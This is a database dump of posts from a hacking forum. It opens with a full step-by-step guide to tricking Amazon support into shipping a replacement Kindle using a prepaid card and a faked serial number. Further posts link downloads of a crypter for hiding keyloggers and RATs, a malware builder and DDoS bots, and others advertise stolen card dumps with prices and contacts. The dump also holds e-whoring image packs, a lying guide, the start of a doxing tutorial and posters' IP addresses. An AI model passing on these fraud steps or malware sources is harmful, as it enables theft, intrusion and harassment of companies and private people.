Amazon Kindles', '0', '5', 'Timmy', '1341437012', '[color=#FF4500]How to SE Amazon Kindles the Complete Tutorial[/color]\r\n\r\n[color=#00BFFF]First you will need to download hotspotshield: http://hotspotshield.com/\r\nThen you must run it every time before doing an SE for safety purposes.\r\nRemember to use hotspot shield throughout all of your SE!![/color]\r\n\r\n\r\n[color=#FFD700]Once you have hotspotshield running we can begin the SE.[/color]\r\n\r\n\r\n[color=#32CD32]First go to your local 7-11 and buy a vanilla visa $25 prepaid VCC. If you don’t have a 7-11 close by try CVS pharmacy. PM if you need one.\r\n[/color]\r\n[color=#32CD32]Once you get a hold of the VCC go ahead and create an email address. I use Hotmail.com because you can create a valid email address really quickly.\r\n[/color]\r\n[color=#9400D3]After creating an email address go to amazon.com and create a new account using that email address. Create a password and put in the name you want to use for the SE. It is useful to put all the info in a notepad document so you don’t have to remember it.[/color]\r\n\r\n[color=#FF1493]After you create your amazon account click on “your account” in the top right corner, then click on manage your kindle on the right hand side. Then click on register your kindle device and you should have a place to put in your kindle serial number. Here I will be teaching you how to SE a kindle fire so we will use a kindle fire serial.[/color]\r\n\r\nFind a kindle fire serial if you don’t have one on hand then use this one: [b]D01EB0A0146501AJ[/b]. Simply replace the last 3 characters (1AJ) with random letters until you get the device successfully registered.\r\n\r\n[color=#8B4513]Once you have done that click on “your account” again on the top right corner and navigate to manage payment options. Click to add a new Card and you should have a window open to put in your Card number and billing address. This is where the vcc comes into play.\r\n[/color]\r\n[color=#FFFFFF]Go ahead and visit the website vanillavisa.com. Click on the vanilla visa gift card tab, and put in your card info. Then on the left side you will see register this card, click on that. You will have a window open to put in your zip code. This is very important otherwise the VCC will not go through. Put in the zip code of the address you will be SEing the kindle to. Once that is done go back to your amazon account.[/color]\r\n\r\n[color=#FF0000]On your amazon account, fill out the card info including its number and expiration date. The cardholders name must match the name you put in your Amazon account when registering so make sure it’s the same. Put the billing address as the address you will be SEing the kindle too and make sure the zip code matches the zip code you registered your VCC with.[/color]\r\n\r\n[color=#1E90FF]Now that you have your kindle registered and your VCC on file its time to do the fun part! The call.[/color]\r\n\r\n[color=#FFD700]Go and get your phone and call this number (make sure to put the *67 in front to hide your number):\r\n*6718662161072 That is the number for the Amazon support, they work 24/7 in the US.(Download clownfish for extra security)[/color]\r\n\r\n[color=#FF0000][b]Have all your info ready on you notepad file because it makes things much more easier (including your name, email address, billing address, VCC)[/b][/color]\r\n\r\n[color=#00BFFF]Now the first thing they will ask you to do is provide them with an order number or an email address. Since we don’t have an order number give them your email address. They will make you verify your name and sometimes address, simply read what you have in your notepad.[/color]\r\n\r\n[color=#32CD32]Then they will ask you “what can we help you with today”\r\nYou say: “I called in about 10 minutes ago about a defective kindle with screen problems but got disconnected while I was on hold”[/color]\r\n\r\n[color=#FF1493]They will apologize that you got disconnected and might ask you to give them more info about the defective kindle. Say:” I received the kindle as a gift and am having screen problems. My screen has some sort of discoloration and vertical lines going through it”\r\n\r\nThe rep should transfer you to the kindle department. They will ask you the same thing and you should say the same thing “ I received the kindle as a gift about a month ago and started having issues with the screen. I called you guys 15 minutes ago and you had me register the defective kindle on my account and had me do a hard reset. However, that didn’t seem to help with the screen issue”.[/color]\r\n\r\n[color=#8B4513]The rep might ask you to perform another hard reset, just go with it and tell him that youre still experiencing the same problem.\r\n\r\nIf all goes well then he should either transfer you to the replacement department or start on the replacement himself.[/color]\r\n\r\n[color=#FFD700]Whenever they start on a replacement they will ask you to verify your last 4 digits of the CC and the expiration date. They will also ask you to verify your billing address. When they ask you for the shipping address say it’s the same as the billing one.\r\n\r\nIf you have registered the VCC on vanillavisa.com it should go through no problem, and the replacement should show up as “shipping soon” on your amazon account in the “your orders” tab.[/color]\r\n\r\n\r\n[color=#FFFFFF]Its THAT simple to SE amazon. Once the replacement processes you can go back on vanillavisa.com and check your balance on the card. You should see a 1$ hold on the account so you’ll have 30 days to spend the remaining 24$ on your gift card.[/color]', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', 'c718a8fefc1a28972ce3157263a7ea61', '0', '0'); INSERT INTO mybb_posts VALUES('88', '33', '0', '20', 'Heavens Crypter FUD', '0', '5', 'Timmy', '1341437435', '[img]http://i45.tinypic.com/34nmb5w.jpg[/img]\n\nhttp://anubis.iseclab.org/?action=result...ormat=html\n\n\nScan report generated by\nNoVirusThanks.org\n\n[b]Report date:[/b] 2012-07-10 01:12:55 (GMT 1)\n[b]File name:[/b] [b]heavens-crypter-v1-exe[/b]\n[b]File size:[/b] 830976 bytes\n[b]MD5 hash:[/b] 450d24a06325aed922f387736e48bb9a\n[b]SHA1 hash:[/b] 4393781390d06d430ec8163565220cfa840bee3a\n[b]Detection rate:[/b] [b]0[/b] on 14 (0%)\n[b]Status:[/b] [color=#32CD32]CLEAN[/color]\n\nhttp://vscan.novirusthanks.org/analysis/...xLWV4ZQ==/\n\nDOWNLOAD\n\nhttp://uploadmirrors.com/download/1KDGM0...ter_V1.rar\n\nhttp://www.mirrorcreator.com/files/0H8TI....rar_links\n\nUsed to make keylogger and RAT servers FUD (Fully Undetected)', '41.174.22.238', '699274990', '1', '0', '1', '1342109879', '1', 'bc86c5cfd990ef42233fa9c470d0487b', '0', '1342109879'); INSERT INTO mybb_posts VALUES('89', '28', '82', '3', 'RE: Buttons updated.', '0', '5', 'Timmy', '1341437507', 'This is a great update, very useful for people from other countries.', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', 'e608468e91132aebf208fdfe06c612d7', '0', '0'); INSERT INTO mybb_posts VALUES('90', '33', '88', '20', 'RE: Ferrari Black Crypter', '0', '1', 't3h jok3r', '1341437621', 'Great crypter. Haven\'t used it yet but heard a lot about it.', '41.174.22.238', '699274990', '1', '0', '0', '0', '1', '31c67247491eed50b22b3b9955111c8d', '0', '0'); INSERT INTO mybb_posts VALUES('91', '31', '86', '7', 'RE: How long are you online daily?', '0', '2', 'Apathy', '1341461699', 'I spend more then I should online.', '173.206.130.232', '-1378975000', '0', '0', '0', '0', '1', 'efb48c94cf1dc6ab8f57cfa0e9338c2e', '0', '0'); INSERT INTO mybb_posts VALUES('92', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '3', '??????????¢™', '1341627612', 'This is a pretty good tutorial OP, Keep it up.', '75.35.238.12', '1260645900', '1', '0', '0', '0', '1', '432f72a2afd5612c981503444a54e788', '0', '0'); INSERT INTO mybb_posts VALUES('93', '34', '0', '3', 'L33THACKING.com is Back', '0', '1', 't3h jok3r', '1342041316', 'L33THacking.com was offline for a couple of days because we were moved to a new server by our hosting so we were having some server maintenance issues. \r\n\r\nNow we are back and hope we stay up for a long time.', '41.174.7.165', '699271077', '1', '0', '0', '0', '1', '8ae2738ffcc75318afaab7d6c3231b54', '0', '0'); INSERT INTO mybb_posts VALUES('94', '35', '0', '4', 'Reminiscing ?\'s Landed', '0', '11', 'Reminiscing ?', '1342041433', 'So hey there to the worldwide community of l33thacking. My names andre, 17 and friends with the forum creator, but don\'t misunderstand that for favoritism. I\'ve just actually recently turned over a new leaf and went White Hat, after seeing my friends going down from the justice system, the so called government. Back on topic; I don\'t bite and current partnership with l33thacking and my forum is currently pending, I won\'t release the link publicly due to the creators wishes.', '92.25.20.80', '1545147472', '0', '0', '0', '0', '1', '47a00bf013140fd4b444f61fc83fff13', '0', '0'); INSERT INTO mybb_posts VALUES('95', '35', '94', '4', 'RE: Reminiscing ?\'s Landed', '0', '1', 't3h jok3r', '1342102341', 'Welcome Reminiscing ?,\n\nI can\'t wait for your forum to be up so we can carry on with out deal. I\'m looking forward to chat with you today regarding our partnership.\n\nHope you enjoy your time out on LH.\n\nP.S: I like the smile on your username.', '41.174.5.180', '699270580', '1', '0', '0', '0', '1', 'ceeefb0d6d3c610a28f2d6fb78053be4', '0', '0'); INSERT INTO mybb_posts VALUES('96', '36', '0', '2', 'Attachments', '0', '1', 't3h jok3r', '1342105715', 'Attachments Style Test', '41.174.5.180', '699270580', '1', '0', '0', '0', '1', '8dabd9416bd88ec06f1f3c7c28bf474f', '0', '0'); INSERT INTO mybb_posts VALUES('97', '37', '0', '5', 'Updates for 7/12/12', '0', '1', 't3h jok3r', '1342107856', 'LH was done for a couple of days so I browsed the MyBB site and found some create tutorials so I would like to share what new modifications I have done today.\r\n\r\n[b]MyBB PHP Website Firewall (with logs)[/b]\r\n\r\n[u][b]Security listing[/b][/u]\r\n* XSS protection\r\n* UNION SQL Injection protection\r\n* Bads bots protection\r\n* Bads requests methods protection\r\n* Small DOS protection\r\n* Inclusion files protection\r\n* Santy and others worms protection\r\n* Server Protection\r\n* URL Query protection\r\n* Cookies sanitize\r\n* Post vars sanitize\r\n* Get vars sanitize\r\n* IPs range reserved denied\r\n* IPs range spam denied\r\n* IPs protected\r\n* Unset globals PHP var\r\n\r\n[hr]\r\n\r\n[b]Moderator notifications (aka Mod Notify)[/b]\r\n\r\nSends notifications (pm) to users in the event of moderators intervention.\r\n\r\n[i]Events I chose[/i]\r\n\r\nUnapprove or Approve Post.\r\nUnapprove or Approve Thread.\r\nSticky or Unsticky a Thread.\r\n\r\n[hr]\r\n\r\n[b]CloudFlare Manager[/b]\r\n\r\nNow we can manage threats etc via ACP.\r\n\r\n[hr]\r\n\r\n[b]Show actual IP on postbit instead of logged word[/b]\r\n\r\nNow when on every post under the posters signature you will see the actual IP address.\r\n\r\n[hr]\r\n\r\n[b]Protect your Admin Directory with htpasswd[/b]\r\n\r\n\r\nYou will need to enter the username and password you made above, then enter your forum details at the ACP login.\r\n \r\n[i]This is the best MyBB Admin Panel Security.[/i]\r\n\r\nP.S: Logins sent on Skype.\r\n\r\n[hr]\r\n\r\n[b]My Permissions[/b]\r\n\r\nWhat is still better about this plugins, is that you can block some actions for other plugins, not just MyBB default actions, here the majority are about plugins actions.\r\n\r\n[hr]\r\n\r\n[b]Adding Reputation as a Sort Option in Memberlist[/b]\r\n\r\nAdded Reputation Search Option in Memberlist.\r\n\r\n[hr]\r\n\r\n[b]Whois lookup[/b] \r\n\r\nWhen you click on a IP on a post, you can do a Whois lookup on the IP.\r\n\r\n[hr]\r\n\r\n[b]Fassim Anti Spam[/b]\r\n\r\nI added this Plugin to block PROXY access and to block some countries in future.', '41.174.5.180', '699270580', '1', '0', '0', '0', '1', 'c11110fb3100bf367eb63cb3f2a4d19f', '0', '0'); INSERT INTO mybb_posts VALUES('98', '38', '0', '16', '[tut] How to lie like a pro', '0', '1', 't3h jok3r', '1342112159', 'This tutorial will teach you how to lie without getting caught.\r\n\r\n[u][b]Requirements[/b][/u]\r\n[list]\r\n[*]Smart Thinker\r\n[*]Must not stam while talking\r\n[/list]\r\n\r\n[b]Step 1[/b]\r\n\r\nDon\'t talk too slow or way too fast.\r\n\r\n[b]Step 2[/b]\r\n\r\nStand close, look into the eyes of who you are talking to, don\'t blink too much, and don\'t bring anything between you two while talking.\r\n\r\n[b]Step 3[/b]\r\n\r\nListen to what they are saying and don\'t forget what you said. Then use facts while lying, never change what your said (You may add something to it but don\'t change your dialogue) and if you are about to get caught then go all the way back or use what they said against them. ALWAYS QUESTION THEM SO THEY GO SPEECHLESS.\r\n\r\n[b]Step 4[/b]\r\n\r\nDon\'t stam or act weird, stay confident.\r\n\r\nThat\'s pretty much it.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '332dea947bfd9b4bc17e6c3cd9c29350', '0', '0'); INSERT INTO mybb_posts VALUES('99', '39', '0', '17', 'E-Whoring Pics Pack of 11 girls', '0', '1', 't3h jok3r', '1342112687', 'This pack consists of 11 girls and its broken up into 2 parts.\r\n\r\nDownload links below.\r\n\r\nhttp://mir.cr/0RUCWDGD\r\nhttp://mir.cr/MWOCUNAD\r\n\r\n[u]Preview\r\n[/u]\r\n\r\nhttp://i.imgur.com/XVuks.jpg\r\nhttp://i.imgur.com/b3wGL.jpg\r\n\r\n\r\nEnjoy.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '30c261e5dd4208182d81a1a82c9fd0b2', '0', '0'); INSERT INTO mybb_posts VALUES('100', '40', '0', '17', '600 pic ewhore pack', '0', '1', 't3h jok3r', '1342112738', 'Download\r\nset1 http://mir.cr/0DQEFUPC\r\nset2 http://mir.cr/1ZWZNM5O\r\nset3 http://mir.cr/TS0WGMBR\r\n\r\nEnjoy.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', 'b9a49aedac090354ac3c5119bcb02d68', '0', '0'); INSERT INTO mybb_posts VALUES('101', '33', '88', '20', 'RE: Heavens Crypter FUD', '0', '5', 'Timmy', '1342113463', 'Crypter updated also replaced the dead link.\n\nEnjoy!', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '42e25ca2e36ea13ed8402caf6faa29c6', '0', '0'); INSERT INTO mybb_posts VALUES('102', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '4', 'Triple H', '1342113556', 'Thanks Reborn.\n\nGood Luck setting up this logger.', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', '236386c7cdf3bb37383d8680f6d26387', '0', '0'); INSERT INTO mybb_posts VALUES('103', '41', '0', '15', 'Virus O Matic.. Virus Creator', '0', '4', 'Triple H', '1342113990', 'This is a simple tool called Virus O Matic which makes a very quick malware / virus when u need a quick virus to fuck with your friends with for fun :)\n\nIts Key features are :\n\nSteals Serial keys \nGay porn attack \nMessage spammer\nOpen, close CD/DVD Rom Loop\nRemote .exe downloader and execute\nBlocks website of your choice\nRedirects google to a site of your choice\nTakes Screenshot and emails to \nDisables Task Maneger , Keyboard and Mouse , registry editor , custom themes\nTurns off screen\nAdds itself to startup\n\nThere are more features but i think that\'s all of them , also the creator disabled the update feature for some reason and NO I AM NOT THE CREATOR OF THIS PROGRAM , ALL CREDITS GO TO : My BR iz Broak for making this\n\nHere is a GIF image to show u how to use this\n\n[img]http://4.bp.blogspot.com/-k1i_PzY73kw/T2Bch4zyiJI/AAAAAAAAAL0/XiJ4VRBzxfI/s1600/Untitled.gif[/img]\n\n\n[lock][b]Download link[/b] : http://www.mediafire.com/download.php?5bkz7a4d768ztrz[/lock]\n\n[quote]\niLikeMonayyy\n[/quote]', '41.174.59.151', '699284375', '1', '0', '1', '1352012241', '1', 'ce032514da426508b3b7ebe560d525ce', '0', '1352012241'); INSERT INTO mybb_posts VALUES('104', '42', '0', '12', '[tut]Hacking 4shared accounts access premium user files', '0', '4', 'Triple H', '1342114102', 'Hi LH\n\nGoing to share a very useful and easy trick with you all :)\n\nHack file hosting 4shared accounts using[u][b] Google[/b][/u]\n\nyeah datz it\n\nYou can download all the files that are at a premium user \n \n\nHere is the trick\n\nGo to Google and in search bar type :\nsite:4shared.com dir +\n\nNow choose from the huge list of results \n\nExample Screenshot below (Warning large image):\n\n[spoiler]\n[img]http://i48.tinypic.com/taod9h.jpg[/img]\n[/spoiler]\n\nCredits: Hax366\n\nEnjoy!', '41.174.59.151', '699284375', '1', '0', '4', '1342114203', '1', 'd373616933bb3c29364f9a318c7d5299', '0', '1342114203'); INSERT INTO mybb_posts VALUES('105', '43', '0', '7', 'How did you find us?', '0', '1', 't3h jok3r', '1342114322', 'How did you find L33thacking.com?', '41.174.59.151', '699284375', '1', '0', '0', '0', '1', 'e3f41fde03ba161f819526df6d77411b', '0', '0'); INSERT INTO mybb_posts VALUES('106', '6', '14', '4', 'RE: Welcome to L33THacking.com', '0', '13', 'unixmoon', '1342145924', 'I am pleased to be here and share my knowledge !', '146.171.254.97', '-1834221983', '0', '0', '0', '0', '1', '27e56520ceaae6b518bedc719d584d50', '0', '0'); INSERT INTO mybb_posts VALUES('107', '44', '0', '8', 'Don\'t Wake Me Up', '0', '13', 'unixmoon', '1342146175', '[video=youtube]http://www.youtube.com/watch?v=QOowQeKyNkQ[/video]', '146.171.254.97', '-1834221983', '0', '0', '0', '0', '1', 'a1d90b64951c9ebc0b12357f1ff9af89', '0', '0'); INSERT INTO mybb_posts VALUES('108', '43', '105', '7', 'RE: How did you find us?', '0', '11', 'Reminiscing ?', '1342191266', 'Was recommended to me, and advertised well.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', '7b8c14f425fc4d98344542d70a83aa8e', '0', '0'); INSERT INTO mybb_posts VALUES('109', '4', '8', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '11', 'Reminiscing ?', '1342191464', 'Well written tutorial, my only advise is that you\'ve missed general proxy\'s out.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'b1df189df91816f7582eb9d135c27df2', '0', '0'); INSERT INTO mybb_posts VALUES('110', '44', '107', '8', 'RE: Don\'t Wake Me Up', '0', '5', 'Timmy', '1342191756', 'Nice song by Chris Brown but I\'m more into hip hop.\n\nWho are your favorite singers?', '41.174.54.183', '699283127', '1', '0', '0', '0', '1', '4f9039030520e6b484c50edafce914c6', '0', '0'); INSERT INTO mybb_posts VALUES('111', '45', '0', '49', 'Varied Sections', '0', '11', 'Reminiscing ?', '1342191908', 'Well, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'e95ea5c13cf272750848777c5fce8547', '0', '0'); INSERT INTO mybb_posts VALUES('113', '45', '111', '49', 'RE: Varied Sections', '0', '1', 't3h jok3r', '1342192466', '[quote=\'Reminiscing ?\' pid=\'111\' dateline=\'1342191908\']\r\nWell, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections.\r\n[/quote]\r\n\r\nThanks for the suggestion.\r\n\r\nThe reason why there are not much sections and only discussions on basic hacking because L33THacking is new and the 3rd rule of making a forum is not to overload your site with forums because you want your forums to be active and don\'t want inactivity in most of your forums neither confuse your members into where to post.', '41.174.54.183', '699283127', '1', '0', '0', '0', '1', 'aa3902e66d8b795e4f3264787cb7d5de', '0', '0'); INSERT INTO mybb_posts VALUES('114', '45', '113', '49', 'RE: Varied Sections', '0', '11', 'Reminiscing ?', '1342192981', '[quote=\'t3h jok3r\' pid=\'113\' dateline=\'1342192466\']\r\n[quote=\'Reminiscing ?\' pid=\'111\' dateline=\'1342191908\']\r\nWell, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections.\r\n[/quote]\r\n\r\nThanks for the suggestion.\r\n\r\nThe reason why there are not much sections and only discussions on basic hacking because L33THacking is new and the 3rd rule of making a forum is not to overload your site with forums because you want your forums to be active and don\'t want inactivity in most of your forums neither confuse your members into where to post.\r\n[/quote]\r\nIndeed, but your forum is limited. So the users have less to choose from when registering.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'a1b6534d1710453cc1674982d0b792ff', '0', '0'); INSERT INTO mybb_posts VALUES('115', '45', '114', '49', 'RE: Varied Sections', '0', '1', 't3h jok3r', '1342193354', '[quote=\'Reminiscing ?\' pid=\'114\' dateline=\'1342192981\']\r\n[quote=\'t3h jok3r\' pid=\'113\' dateline=\'1342192466\']\r\n[quote=\'Reminiscing ?\' pid=\'111\' dateline=\'1342191908\']\r\nWell, the forum is constructed well, designed and managed well. The only issue is, the varies of sections. What I mean by this is, that the forum only caters for \"Hacking\" why not bring along the useful stuff that bond with hacking such as crypters and how they work etc. If you get my drift that i\'m going for, things related to the current sections.\r\n[/quote]\r\n\r\nThanks for the suggestion.\r\n\r\nThe reason why there are not much sections and only discussions on basic hacking because L33THacking is new and the 3rd rule of making a forum is not to overload your site with forums because you want your forums to be active and don\'t want inactivity in most of your forums neither confuse your members into where to post.\r\n[/quote]\r\nIndeed, but your forum is limited. So the users have less to choose from when registering.\r\n[/quote]\r\n\r\nUmmm could you elaborate what you mean by limited?', '41.174.54.183', '699283127', '1', '0', '0', '0', '1', 'dfc9caad6499ae8ad9d3d93f4c7776b9', '0', '0'); INSERT INTO mybb_posts VALUES('116', '22', '62', '14', 'RE: Cyberghost VPN (Free/Premium)', '0', '7', 'Romdu62', '1342205168', 'Awesome VPN.\n\nThanks for this, very helpful.', '41.174.11.149', '699272085', '0', '0', '0', '0', '1', '44454364022ff0984388ba1cd5a3a4e9', '0', '0'); INSERT INTO mybb_posts VALUES('117', '45', '111', '49', 'RE: Varied Sections', '0', '11', 'Reminiscing ?', '1342211111', 'They have less to choose from.', '78.146.232.150', '1318250646', '0', '0', '0', '0', '1', 'a572cd0c15d12d387877cf9d2e8c52b3', '0', '0'); INSERT INTO mybb_posts VALUES('118', '46', '0', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '6', 'Trusted_hacker', '1342262132', 'The selection price will depend on the guiding prices for each separate country. At the same time, there are no setups. You can run a small test of 20-50 items to check your software for an individual country or a 50-100 Mix (free); however, this option is offered on a one-time basis and only to a new customer.\r\n\r\nFOR USA DUMPS\r\n\r\nCLASSIC/STANDARD: $20\r\nGOLD/PLAT:$30\r\nSIGN/CORP/BIZ/WORLD/PURCH: $35\r\nDISCO: $25\r\nAMEX: $16 (ALL)\r\n\r\n\r\nCANADA 101\r\nCLASSIC/STANDARD: $40\r\nGOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $50\r\n\r\nCANADA 201\r\nCLASSIC/STANDARD: $30\r\nGOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $40\r\n\r\nFOR EU 101 DUMPS\r\nCLASSIC/STANDARD: $100\r\nGOLD/PLAT: $120\r\nCORP/WORLD/BIZZ/SIGN: $130\r\nINFINITE: $150\r\n\r\nRULES: \r\nPayments only through LR\r\n\r\nInstant Delivery \r\n\r\nNo Minimum order \r\n\r\nDumps checking by ask, I don\'t replace checked stuff! \r\n\r\nLost/Stolen Replace in 24 hours!! \r\n\r\nReplayce always will be checked! \r\n\r\nNo replace for region lock! \r\n\r\nNo Dumps with pins \r\n\r\nNo Free No Test Dumps!! \r\n\r\nBINLIST AVAILABLE ONLY FOR GOOD CUSTOMERS \r\n\r\n\r\nCONTACT :\r\n\r\nICQ : 612113985\r\n\r\nEMAIL : lua.xuan2000@yandex.com', '94.46.241.97', '1580134753', '0', '0', '0', '0', '1', '1c3a3a8cc2cff26855c2e6a16e6bf1f6', '0', '0'); INSERT INTO mybb_posts VALUES('119', '47', '0', '19', '[Junk][Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '6', 'Trusted_hacker', '1342262231', 'The selection price will depend on the guiding prices for each separate country. At the same time, there are no setups. You can run a small test of 20-50 items to check your software for an individual country or a 50-100 Mix (free); however, this option is offered on a one-time basis and only to a new customer.\r\n\r\nFOR USA DUMPS\r\n\r\nCLASSIC/STANDARD: $20\r\nGOLD/PLAT:$30\r\nSIGN/CORP/BIZ/WORLD/PURCH: $35\r\nDISCO: $25\r\nAMEX: $16 (ALL)\r\n\r\n\r\nCANADA 101\r\nCLASSIC/STANDARD: $40\r\nGOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $50\r\n\r\nCANADA 201\r\nCLASSIC/STANDARD: $30\r\nGOLD/PLAT/SIG/BIZZ/CORP/PURCH/WORLD: $40\r\n\r\nFOR EU 101 DUMPS\r\nCLASSIC/STANDARD: $100\r\nGOLD/PLAT: $120\r\nCORP/WORLD/BIZZ/SIGN: $130\r\nINFINITE: $150\r\n\r\nRULES: \r\nPayments only through LR\r\n\r\nInstant Delivery \r\n\r\nNo Minimum order \r\n\r\nDumps checking by ask, I don\'t replace checked stuff! \r\n\r\nLost/Stolen Replace in 24 hours!! \r\n\r\nReplayce always will be checked! \r\n\r\nNo replace for region lock! \r\n\r\nNo Dumps with pins \r\n\r\nNo Free No Test Dumps!! \r\n\r\nBINLIST AVAILABLE ONLY FOR GOOD CUSTOMERS \r\n\r\n\r\nCONTACT :\r\n\r\nICQ : 612113985\r\n\r\nEMAIL : lua.xuan2000@yandex.com', '94.46.241.97', '1580134753', '0', '0', '0', '0', '1', 'b9278ebe173113bea879ff268454398a', '0', '0'); INSERT INTO mybb_posts VALUES('120', '46', '118', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '1', 't3h jok3r', '1342265729', 'This thread has been junked.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('121', '47', '119', '19', '[Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '1', 't3h jok3r', '1342266079', 'This thread has been junked.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('122', '47', '119', '19', '[Junk][Junk]++++Best Approval of Dumps with Good Vallid Rate++++', '0', '1', 't3h jok3r', '1342266080', 'This thread has been junked.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('123', '45', '117', '49', 'RE: Varied Sections', '0', '1', 't3h jok3r', '1342266617', '[quote=\'Reminiscing ?\' pid=\'117\' dateline=\'1342211111\']\r\nThey have less to choose from.\r\n[/quote]\r\n\r\nRight but I can\'t overload my website with forums and have more inactivity in those sections. I\'m looking forward to make my current sections active first and then create more sections. What you see at the moment is not everything, we have some more blackhat sections for upgraded members.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', 'aec19e9487d0357cfd56786db23cee9c', '0', '0'); INSERT INTO mybb_posts VALUES('124', '6', '14', '4', 'RE: Welcome to L33THacking.com', '0', '5', 'Timmy', '1342266771', 'Thanks for clarifying the admin tasks. I guess it makes it easier to understand what to report to who.', '41.174.2.237', '699269869', '1', '0', '0', '0', '1', '3c54fbb59420515c9f5d7ab46dfa5bdc', '0', '0'); INSERT INTO mybb_posts VALUES('125', '48', '0', '21', '[Strong] Anonymous DoSer _z0r0_in C #', '0', '8', 'spacefish36', '1342303751', '[align=center][img]http://www.nextgn.com/wp-content/uploads/2011/04/anon.jpg[/img][/align]\n\n[b]Proof[/b] (Warning: Large picture)\n\n[spoiler]\n[img]http://puu.sh/t5Cw[/img]\n[/spoiler]\n\n\n[b]Scan[/b]\nhttps://www.virustotal.com/file/8ac9f45f1114268b8ce3f77a6625ff4d6261388994c5c82b9c549974549b0f7c/analysis/1336229161/\n\n[b]Download[/b]\n\n[lock]http://goo.gl/X9Xo6[/lock]', '41.174.8.40', '699271208', '0', '0', '1', '1352012301', '1', '054588a88df686194e7e4284111df2dc', '0', '1352012301'); INSERT INTO mybb_posts VALUES('126', '49', '0', '21', 'Pandora DDOS Bot [Direct Link]', '0', '8', 'spacefish36', '1342304133', '[align=center][img]http://i.imgur.com/GfSB4.png[/img]\r\n\r\n[b]Download Link[/b]\r\n\r\n[quote]\r\nhttp://www.mediafire.com/?4jmj1j38xxlbmsa\r\n[/quote]\r\n\r\nFound this on opensc.ws, Great DDOS bot.\r\nEnjoy guys!\r\nRegards,\r\nspacefish36\r\n\r\n[/align]', '41.174.8.40', '699271208', '0', '0', '8', '1342304236', '1', '77f6b2bce310a9fa3f66c5a2e40a96f0', '0', '1342304236'); INSERT INTO mybb_posts VALUES('127', '43', '105', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1342389820', 'Lol I recommended you and thanks for joining and being active.', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', 'e4b2b651eb6e50d14b9b116c121477fd', '0', '0'); INSERT INTO mybb_posts VALUES('128', '4', '109', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '1', 't3h jok3r', '1342390102', '[quote=\'Reminiscing ?\' pid=\'109\' dateline=\'1342191464\']\r\nWell written tutorial, my only advise is that you\'ve missed general proxy\'s out.\r\n[/quote]\r\n\r\nActually a VPN is better than a proxy so he kept a VPN has a major concern.', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', 'aea197022eb47cfe46e65657a3f3f476', '0', '0'); INSERT INTO mybb_posts VALUES('129', '41', '103', '15', 'RE: Virus O Matic.. Virus Creator', '0', '1', 't3h jok3r', '1342392396', 'Awesome. Thanks for this but don\'t you think those n00bs would be happy after getting a virus?', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', '631e2911874b51cdd55b5e63a9bde7e2', '0', '0'); INSERT INTO mybb_posts VALUES('130', '41', '103', '15', 'RE: Virus O Matic.. Virus Creator', '0', '4', 'Triple H', '1342392556', 'Happy, they should throw a party and call me.', '41.174.16.115', '699273331', '1', '0', '0', '0', '1', 'b1f73c01dd42bb53b013e437c1091fc9', '0', '0'); INSERT INTO mybb_posts VALUES('131', '42', '104', '12', 'RE: [tut]Hacking 4shared accounts access premium user files', '0', '2', 'Apathy', '1342393326', 'Wow nice share I did not know about this thanks.', '173.206.139.19', '-1378972909', '0', '0', '0', '0', '1', '5fac59f0b210d0c1c70f89f864312778', '0', '0'); INSERT INTO mybb_posts VALUES('132', '50', '0', '12', '[tut]How to DOX', '0', '1', 't3h jok3r', '1342395175', '[color=#00BFFF]DOXing is my favorite blackhat technique because who ever messes with me online gets DOXed and hacked with the info I have. [/color]\n\n[u][b]Requirements[/b][/u]\n\n[list]\n[*] Notepad\n[*] Email Address of the Victim\n[/list]\n\n[b]What is a DOX?[/b]\n\nDOX is NOT hacking. DOXing is when you get a persons information from the internet without asking the victim. You find out their address, name, age, etc.\n\nExample by LH: http://pastebin.com/eXVxALWX\n\n[b]How can I use a DOX to hack?[/b]\n\nYou can use it to answer [i]security questions[/i] or [i]Social Engineer[/i].\n\n[b]How to DOX?[/b]\n\nLets say our victims email address is [b]alien@hotmail.com[/b].\n\n[color=#FF4500]So first what I would do is try grabbing information of my victim using [i][b]Roxer Doxer[/b][/i] 